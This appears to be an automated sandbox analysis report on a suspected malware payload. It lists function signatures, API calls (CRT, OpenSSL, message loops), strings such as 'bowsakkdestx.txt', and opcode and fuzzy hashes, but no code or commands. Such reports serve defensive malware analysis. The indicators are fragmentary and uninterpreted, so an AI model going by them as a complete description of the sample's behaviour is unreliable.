                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: $+$0123456789ABCDEF$UlK
                                                                                                                            • API String ID: 1302938615-392471189
                                                                                                                            • Opcode ID: dce93e00dbe434c578cd0a3cec7124c6329c8a5fd6c7f05eb1ebf6821a20af9a
                                                                                                                            • Instruction ID: 5d79033a0d1641cee28c1ec0bcd5030b108edf4232128083af2b5817aebdf2d9
                                                                                                                            • Opcode Fuzzy Hash: dce93e00dbe434c578cd0a3cec7124c6329c8a5fd6c7f05eb1ebf6821a20af9a
                                                                                                                            • Instruction Fuzzy Hash: 74818DB1A087509FD720CF298840A6BBBE5BFC8754F15091EF989A3352D338DD058BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 004B07C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                            • API String ID: 601868998-2416195885
                                                                                                                            • Opcode ID: 984a5882fba86864009996f49346ea0bdf88ef3a56d77961d231db0fbdd02bea
                                                                                                                            • Instruction ID: 8a5badbd6d10ce0d3b27618c4de3becb9d81d01ee054be2f893b7bfdee36208f
                                                                                                                            • Opcode Fuzzy Hash: 984a5882fba86864009996f49346ea0bdf88ef3a56d77961d231db0fbdd02bea
                                                                                                                            • Instruction Fuzzy Hash: 3641E771A043059BDB24EE15CC45BEFB7D8EF85349F00082FF58593241EA79E9098BB6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$g9L
                                                                                                                            • API String ID: 2102423945-957670896
                                                                                                                            • Opcode ID: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction ID: 7dc351e9e75f57ed17621435b292e6d8d9c7ecc1bf5e76977484c5a99075eabc
                                                                                                                            • Opcode Fuzzy Hash: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction Fuzzy Hash: 352106B6B403213FE214665DFC42B96B399EB84B18F10442AF208D72C2D374E821C3E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00525D3D
                                                                                                                              • Part of subcall function 0048501F: GetLastError.KERNEL32(00000001,00000000,0048520D,00480CE9,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00485021
                                                                                                                              • Part of subcall function 0048501F: __calloc_crt.LIBCMT ref: 00485042
                                                                                                                              • Part of subcall function 0048501F: __initptd.LIBCMT ref: 00485064
                                                                                                                              • Part of subcall function 0048501F: GetCurrentThreadId.KERNEL32 ref: 0048506B
                                                                                                                              • Part of subcall function 0048501F: SetLastError.KERNEL32(00000000,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00485083
                                                                                                                            • __calloc_crt.LIBCMT ref: 00525D60
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525D7E
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525DCD
                                                                                                                            Strings
                                                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00525D48, 00525D6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                            • API String ID: 3123740607-798102604
                                                                                                                            • Opcode ID: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction ID: 0b4f772ee93538a19ccd2b473515f8b46fe559c533960dc63fdf19f0a1aaaaa0
                                                                                                                            • Opcode Fuzzy Hash: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction Fuzzy Hash: 4511B671541E256BEB213B76AC05ABF7BDCFF427A4F10086AFE0596281F6359E0043E5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fprintf_memset
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                            • API String ID: 3021507156-3399676524
                                                                                                                            • Opcode ID: 8c6ff673101b8582d0267358946e3e18b3e12956234ee078753d4f21bfe3f403
                                                                                                                            • Instruction ID: 369716b1bf070bcdf10903e5072480642b3b08e19738a687f3b07712abc9855d
                                                                                                                            • Opcode Fuzzy Hash: 8c6ff673101b8582d0267358946e3e18b3e12956234ee078753d4f21bfe3f403
                                                                                                                            • Instruction Fuzzy Hash: C8215B76A443113BE720A9275C02FBB7799DFC1B9CF04481EFE50672C6D625DD0642B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A1726
                                                                                                                            • _strlen.LIBCMT ref: 004A1734
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • _strnlen.LIBCMT ref: 004A17BF
                                                                                                                            • __lock.LIBCMT ref: 004A17D0
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A17DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2168648987-0
                                                                                                                            • Opcode ID: 5fca748596b5a98dbbca5436f3bdb1c05904b40e312e46e2221f73c222cfcaac
                                                                                                                            • Instruction ID: 84d36f6f7b23f9a605ec562353b62274fdcdd37fd3cb2a3fc24995b5777e5858
                                                                                                                            • Opcode Fuzzy Hash: 5fca748596b5a98dbbca5436f3bdb1c05904b40e312e46e2221f73c222cfcaac
                                                                                                                            • Instruction Fuzzy Hash: 4B31593AA04225ABDB217BB9CC01BAF37949F22B64F14051BF814DB391DF7C880087AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0049B70B
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _free.LIBCMT ref: 0049B71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: aa7ba2753989eac8a99e813a82520e4a1b1d28ee97a879ceeff1ea1536972a8c
                                                                                                                            • Instruction ID: fae7b0904c1cca2fb82f650d6bc482dc71516e53d9326d8cef4e01f4f0427edd
                                                                                                                            • Opcode Fuzzy Hash: aa7ba2753989eac8a99e813a82520e4a1b1d28ee97a879ceeff1ea1536972a8c
                                                                                                                            • Instruction Fuzzy Hash: 2611C432408615ABCF203BF5B985A5E3EC8DF51364B100BBBF85896251DF3C88409BD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047F085
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0AC
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047F0B6
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0C4
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047F0D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 89dba03d18b4bdcc32a07d0745b9af22508b7246dcbde30d5257c87026a802d6
                                                                                                                            • Instruction ID: a32a788c75e48d68059082e63f6abf7ec19649cae72bad030ca90558325a2686
                                                                                                                            • Opcode Fuzzy Hash: 89dba03d18b4bdcc32a07d0745b9af22508b7246dcbde30d5257c87026a802d6
                                                                                                                            • Instruction Fuzzy Hash: 1901DB35640308B6E730DB55EC46F9A3B6CEB64B10F108421FA04AB2D3D7B5A54DFBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047E515
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E53C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047E546
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E554
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047E562
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: aa70838de973720e6f2559b6d3013faaa1ee0830c32d3f9b16a14085bd2562cf
                                                                                                                            • Instruction ID: f073d1624d2ce1809fa69f46634a6e6988ebb60ea847fdf7871033eb0211a217
                                                                                                                            • Opcode Fuzzy Hash: aa70838de973720e6f2559b6d3013faaa1ee0830c32d3f9b16a14085bd2562cf
                                                                                                                            • Instruction Fuzzy Hash: 8B017B3474030976E730DB51EC46F9A7B6DEB58B14F104441FA04AB1D2D6F4A54EE7D4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FA53
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA71
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FA7B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA89
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FA94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction ID: 397fdd5335d02129c38b8e0f6292f733a436b156887340f9a041782fd1965de3
                                                                                                                            • Opcode Fuzzy Hash: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction Fuzzy Hash: D5018631B40309B7EB309B54DC4AFAB3F6CAB59B40F548461FA04AE1D2D7F5A80986A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FE03
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE21
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FE2B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE39
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FE44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction ID: aead49e14035084006ce4a1c5c845b54f10400c50ee4d561ec8828ced85e7812
                                                                                                                            • Opcode Fuzzy Hash: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction Fuzzy Hash: F401D631B40308B7EB309B94DC4AF9B3F6CEF59B40F008421FA04AE1D2D7F5A80986A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: a6204cd0b5564a8d1ccc89115c328ede6aabfd4149ac7a2c2b2114b85fe7d971
                                                                                                                            • Instruction ID: 3d27813f96c18325d77b53de33a320100ccf3a830b7a448b5caa3450280333c1
                                                                                                                            • Opcode Fuzzy Hash: a6204cd0b5564a8d1ccc89115c328ede6aabfd4149ac7a2c2b2114b85fe7d971
                                                                                                                            • Instruction Fuzzy Hash: 3E51E5317042049FDB25CE1CDD809AA77A6EF89304B64C91FF859CB341DB75EC518B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                            • String ID: G
                                                                                                                            • API String ID: 3115901604-2458028032
                                                                                                                            • Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                                            • Instruction ID: 48cbb1565c4e4db2fa6d0ef0fbec28ca869b109ac199fb4be486a97d847568f2
                                                                                                                            • Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                                            • Instruction Fuzzy Hash: FE41C670B006069FDB2CAEA9CA8056F77A5BF44360B14892FE815C7380DBF8DD819B58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: da96a5660da9895edc2236e888aecd59f6632275cdf126207958f5b4112cd0e1
                                                                                                                            • Instruction ID: 5f99cd289d604d68bf5f3492483e84ef7573edcb51cd1377e6ec1013d2ac2499
                                                                                                                            • Opcode Fuzzy Hash: da96a5660da9895edc2236e888aecd59f6632275cdf126207958f5b4112cd0e1
                                                                                                                            • Instruction Fuzzy Hash: D5312A31300104ABDB24EE4CCC859BB77A6EBC17507608A5EF869CB782D735ED518BAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$C7L
                                                                                                                            • API String ID: 2102423945-2563974722
                                                                                                                            • Opcode ID: b63b64def75f4b19ebcf6d1bb6115a4758b79b3b8c2d108ea492648dfd34b2a0
                                                                                                                            • Instruction ID: 6f557642a2fad1dbe27ebd17fd7dd6eb5eb0e9abeae4b16b15aa5be2b0ccf5ac
                                                                                                                            • Opcode Fuzzy Hash: b63b64def75f4b19ebcf6d1bb6115a4758b79b3b8c2d108ea492648dfd34b2a0
                                                                                                                            • Instruction Fuzzy Hash: E421F8B5B442117BE2146669FC43B96B389EB94B18F10402BF718D76C1D2B4AC11C7E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 0046C5DA
                                                                                                                            • UuidToStringA.RPCRT4(?,00000000), ref: 0046C5F6
                                                                                                                            • RpcStringFreeA.RPCRT4(00000000), ref: 0046C640
                                                                                                                            Strings
                                                                                                                            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0046C687
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUuid$CreateFree
                                                                                                                            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                            • API String ID: 3044360575-2335240114
                                                                                                                            • Opcode ID: 8e4cfb4e7aa054f50a4e7caa812016fafd4e3133f1a9ad4cd76236b81a8c095c
                                                                                                                            • Instruction ID: bd0ce05f9f734096b249bb812e2112a8d1c054526c771fd0548c405df3255733
                                                                                                                            • Opcode Fuzzy Hash: 8e4cfb4e7aa054f50a4e7caa812016fafd4e3133f1a9ad4cd76236b81a8c095c
                                                                                                                            • Instruction Fuzzy Hash: D521DA71104341ABDB20DF24D8447AFBBE8AF91758F004E5FF4C987251E7B99509879B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C48B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C4A9
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                            • String ID: 0$>V
                                                                                                                            • API String ID: 1693014935-1223471409
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C438
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C44E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0046C45B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendDeleteFileFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 610490371-2616962270
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strtok
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446180046-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974526305-0
